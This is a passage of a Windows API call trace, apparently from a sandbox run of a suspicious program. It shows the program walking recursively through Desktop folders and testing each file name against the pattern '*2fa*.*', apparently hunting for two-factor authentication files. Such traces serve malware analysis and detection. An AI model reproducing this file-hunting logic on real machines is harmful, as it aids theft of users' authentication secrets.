lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", lpUsedDefaultChar=0x0) returned 58 [0110.842] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28a0 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.842] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaba0 [0110.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aaba0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.842] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*2fa*.*") returned 0 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28a0 | out: hHeap=0x29a0000) returned 1 [0110.842] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.842] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.843] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.843] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.843] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.843] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.843] lstrcatW (in: lpString1="\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="\\KTOu\\LQQ8KQ8OZpD-.wav") returned="\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.843] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.843] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea898 [0110.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x38ea898, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", lpUsedDefaultChar=0x0) returned 53 [0110.843] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ae0 [0110.843] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea898 | out: hHeap=0x29a0000) returned 1 [0110.843] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.843] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac18 [0110.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aac18, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.843] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.843] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*2fa*.*") returned 0 [0110.843] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.843] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.843] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.843] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.843] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.843] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.843] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.843] lstrcatW (in: lpString1="\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.843] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2=".") returned 1 [0110.843] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2="..") returned 1 [0110.844] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.844] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*" [0110.844] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437a0 [0110.844] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.844] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.844] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\." [0110.844] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.844] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.844] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\.") returned="\\KTOu\\UQEQQujqhNYM\\." [0110.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.844] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.844] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.844] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.844] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.." [0110.844] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.844] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.844] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\..") returned="\\KTOu\\UQEQQujqhNYM\\.." [0110.844] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.844] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.844] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.844] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.844] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.844] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.845] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.845] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.845] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.845] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.845] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a27c8 [0110.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x29a27c8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", lpUsedDefaultChar=0x0) returned 58 [0110.845] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c90 [0110.845] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0110.845] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.845] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabe8 [0110.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x29aabe8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.845] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabe8 | out: hHeap=0x29a0000) returned 1 [0110.845] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*2fa*.*") returned 0 [0110.845] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c90 | out: hHeap=0x29a0000) returned 1 [0110.845] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.845] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.845] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.845] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.845] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.845] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.845] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.845] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.845] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2b28 [0110.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x29a2b28, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", lpUsedDefaultChar=0x0) returned 62 [0110.846] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.846] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.846] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.846] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab40 [0110.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x29aab40, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.846] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab40 | out: hHeap=0x29a0000) returned 1 [0110.846] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*2fa*.*") returned 0 [0110.846] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.846] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.846] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.846] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.846] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.846] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.846] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.846] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.846] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.846] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2a08 [0110.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x29a2a08, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", lpUsedDefaultChar=0x0) returned 59 [0110.846] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ae0 [0110.846] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0110.846] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.846] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab70 [0110.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x29aab70, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.846] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab70 | out: hHeap=0x29a0000) returned 1 [0110.847] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*2fa*.*") returned 0 [0110.847] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.847] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.847] FindClose (in: hFindFile=0x7437a0 | out: hFindFile=0x7437a0) returned 1 [0110.847] RtlAllocateHeap 